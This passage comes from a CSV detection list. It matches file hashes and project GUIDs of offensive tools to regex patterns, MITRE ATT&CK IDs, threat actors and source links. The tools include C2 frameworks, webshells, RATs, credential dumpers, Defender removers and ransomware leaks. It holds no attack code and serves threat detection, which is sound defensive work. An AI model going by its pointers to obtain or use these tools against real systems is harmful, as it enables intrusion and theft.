FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","41827"
"*E17B7339-C788-4DBE-B382-3AEDB024073D*",".{0,1000}E17B7339\-C788\-4DBE\-B382\-3AEDB024073D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","41828"
"*e17d9c10a343762b54f938c0eaf63f479140792c7a27c876d4bccfe09e5d924c*",".{0,1000}e17d9c10a343762b54f938c0eaf63f479140792c7a27c876d4bccfe09e5d924c.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","41829"
"*e18997da91a7bfcb5f6c35a843e35c3cf727ddd8b1dec167c9dff8af5f700f67*",".{0,1000}e18997da91a7bfcb5f6c35a843e35c3cf727ddd8b1dec167c9dff8af5f700f67.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41831"
"*E192C3DF-AE34-4E32-96BA-3D6B56EA76A4*",".{0,1000}E192C3DF\-AE34\-4E32\-96BA\-3D6B56EA76A4.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#GUIDproject","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","41833"
"*e19603f3ae1a655ed21fdf9544e936b4510704024aeffdb69125d87373509e88*",".{0,1000}e19603f3ae1a655ed21fdf9544e936b4510704024aeffdb69125d87373509e88.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","41835"
"*e1966d7c2abe5f6f610c745858ab19a48b1b4ee7db738e15f4bb8b1009f38eb9*",".{0,1000}e1966d7c2abe5f6f610c745858ab19a48b1b4ee7db738e15f4bb8b1009f38eb9.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41836"
"*e1a00c7c01ea97ed1aa4eed7493555bcecc1b7e2280d89f7bcc0631541ba4388*",".{0,1000}e1a00c7c01ea97ed1aa4eed7493555bcecc1b7e2280d89f7bcc0631541ba4388.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","41837"
"*e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996*",".{0,1000}e1a068365245f8a021fca5f8b40a2cc5aedd235015c39db6697b7d3ba05cd996.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41838"
"*e1a58a89aa3d31654d9496700ebbfb27e2914cce90d78425864b948097c35090*",".{0,1000}e1a58a89aa3d31654d9496700ebbfb27e2914cce90d78425864b948097c35090.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","41839"
"*e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65*",".{0,1000}e1a5b167ec626fd934b6abac47d82987ba3313d505c1b3487072cca8ca9c4e65.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41840"
"*e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887*",".{0,1000}e1aa34410dd260529c0e32bb0fbc5263f3042bf47d01dc5ad424bb8cecc2b887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41841"
"*E1AC3CD517F50462DD5B022F4D0016F3B9E8BCD8FC72B86FBB94C36BBA6EE543*",".{0,1000}E1AC3CD517F50462DD5B022F4D0016F3B9E8BCD8FC72B86FBB94C36BBA6EE543.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","41843"
"*e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496*",".{0,1000}e1b23e90752a40a4a54afc406b874655f6d279a26e140402ad3f69509e9da496.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41844"
"*e1b5f5c1f80865429429388b5d20c8b536b62b4596f19768bfacb315982697e8*",".{0,1000}e1b5f5c1f80865429429388b5d20c8b536b62b4596f19768bfacb315982697e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41845"
"*e1b86769bb6117e974ed565ca81ee32307d1f38cbecba8495e97c2555197d090*",".{0,1000}e1b86769bb6117e974ed565ca81ee32307d1f38cbecba8495e97c2555197d090.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41846"
"*e1bab498bacf77137139b848d080c2e4cb7d7e6b34573ec309ab3268de4ba089*",".{0,1000}e1bab498bacf77137139b848d080c2e4cb7d7e6b34573ec309ab3268de4ba089.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41847"
"*e1cd2b55-3b4f-41bd-a168-40db41e34349*",".{0,1000}e1cd2b55\-3b4f\-41bd\-a168\-40db41e34349.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","#GUIDproject","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","41849"
"*e1cf6f45fb64f8e043740015fc1c48d68f8a062be61bc320dbf54fb25ee87fbf*",".{0,1000}e1cf6f45fb64f8e043740015fc1c48d68f8a062be61bc320dbf54fb25ee87fbf.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","41850"
"*e1d459e568068bae8db668a9478e7d373afda5a174f2ea54a329056f5d6b681b*",".{0,1000}e1d459e568068bae8db668a9478e7d373afda5a174f2ea54a329056f5d6b681b.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","41851"
"*E1D50AB4-E1CD-4C31-AED5-E957D2E6B01F*",".{0,1000}E1D50AB4\-E1CD\-4C31\-AED5\-E957D2E6B01F.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#GUIDproject","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","41852"
"*e1d9d19cb999647e1261d85578063cb1bd62a0f62ee22dadfdfa0ffd7f567fd6*",".{0,1000}e1d9d19cb999647e1261d85578063cb1bd62a0f62ee22dadfdfa0ffd7f567fd6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41855"
"*e1ea0335cc65cd6ab35fb804fd5b5739ae1b26ef43be230a24113475edecf6bd*",".{0,1000}e1ea0335cc65cd6ab35fb804fd5b5739ae1b26ef43be230a24113475edecf6bd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41858"
"*e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb*",".{0,1000}e1ed358b0e31199ca8ae3cc4307183d3131c27cef32c610bcc955a03527057bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41859"
"*e1ed880a56c4cbe995035969850bb409996edba8e31c05d654f525112026633f*",".{0,1000}e1ed880a56c4cbe995035969850bb409996edba8e31c05d654f525112026633f.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","41860"
"*e1eeb3735ada6088c8b1a740671d4430b26249f1f9b09b5052a00d398c832815*",".{0,1000}e1eeb3735ada6088c8b1a740671d4430b26249f1f9b09b5052a00d398c832815.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41861"
"*e1f73610acb162bda5e6e46fdfbcb52c9259558566a659d979b8f794acc624a5*",".{0,1000}e1f73610acb162bda5e6e46fdfbcb52c9259558566a659d979b8f794acc624a5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41864"
"*e1f8df267cad6116eb09bcb7047cae858b291630d86d9b5eb0879cb22cabc66c*",".{0,1000}e1f8df267cad6116eb09bcb7047cae858b291630d86d9b5eb0879cb22cabc66c.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41865"
"*e200d8dc85bb86dbaea7479accc22dbb5a80776d45a5f7d156816db9faffdfb3*",".{0,1000}e200d8dc85bb86dbaea7479accc22dbb5a80776d45a5f7d156816db9faffdfb3.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","41869"
"*e209287748c60d712f78c33501841c2148db4cddc98ec6c543262c203300bfd9*",".{0,1000}e209287748c60d712f78c33501841c2148db4cddc98ec6c543262c203300bfd9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41871"
"*e21059349b25d8158d9000d34dc6b296e4a680c7b613ad8455bae2df118d7dcc*",".{0,1000}e21059349b25d8158d9000d34dc6b296e4a680c7b613ad8455bae2df118d7dcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41875"
"*E211C5CD-85F0-48D2-A18F-2E59AD47DDC3*",".{0,1000}E211C5CD\-85F0\-48D2\-A18F\-2E59AD47DDC3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","41876"
"*e213ddff412e4aaa9a0cd6460b14cc246a5b33e60f76440482e0142b8a239ff9*",".{0,1000}e213ddff412e4aaa9a0cd6460b14cc246a5b33e60f76440482e0142b8a239ff9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41878"
"*e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c*",".{0,1000}e21abc2c59ac704df355a42b7275021e48670c876d019f05f56bf5a9c4cff78c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41879"
"*e21f177a1cf17b0f3b336054e36ae97bdad19d7204b23944fcea7d81c3272c3b*",".{0,1000}e21f177a1cf17b0f3b336054e36ae97bdad19d7204b23944fcea7d81c3272c3b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41880"
"*e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967*",".{0,1000}e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41881"
"*e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967*",".{0,1000}e21f6e3c1907732a3654077febd8b675cab97d2ef3529e8dcfa6ce16ffd80967.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","41882"
"*e22080246ffecef9d922c07fe2511b93f8b7d585b6a2c9b2d6332a93b2e5cf87*",".{0,1000}e22080246ffecef9d922c07fe2511b93f8b7d585b6a2c9b2d6332a93b2e5cf87.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","41883"
"*e224ba9728a4a03d2f06da625241c25b61b2b15b5124c1384eeee8dcba2ce208*",".{0,1000}e224ba9728a4a03d2f06da625241c25b61b2b15b5124c1384eeee8dcba2ce208.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41885"
"*e22a97f69dbd69e72d2bd9b542a44c33a2139963ca121976085de6bc23858ce9*",".{0,1000}e22a97f69dbd69e72d2bd9b542a44c33a2139963ca121976085de6bc23858ce9.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","41886"
"*e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e*",".{0,1000}e230c0ac37691456fdf0363b1f81215c15a7a235ddc96f072c74c5ac40866c9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41887"
"*e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb*",".{0,1000}e237f1a9a8fc58940811f2ea1eb987242718290c588fb36c29741176700980bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41888"
"*e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3*",".{0,1000}e23efc384f4295bb8fbf5b0e6f2f3539f6ff45fbc2ef8ce2bb54aefebaa069e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41889"
"*e241be711b4e535d9275bd5878d45e4c89bf4e269d27f1742aa9b2410d68ebf2*",".{0,1000}e241be711b4e535d9275bd5878d45e4c89bf4e269d27f1742aa9b2410d68ebf2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","41890"
"*e24dd6d8fb7ae3f556d3a64acf5627d210e92f4ca2e9473278b7273d21a696b3*",".{0,1000}e24dd6d8fb7ae3f556d3a64acf5627d210e92f4ca2e9473278b7273d21a696b3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","41894"
"*e258ac6068d1de41188caf6269d662aadf7b6e0489aa7b18b32a57f4691559e3*",".{0,1000}e258ac6068d1de41188caf6269d662aadf7b6e0489aa7b18b32a57f4691559e3.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","41895"
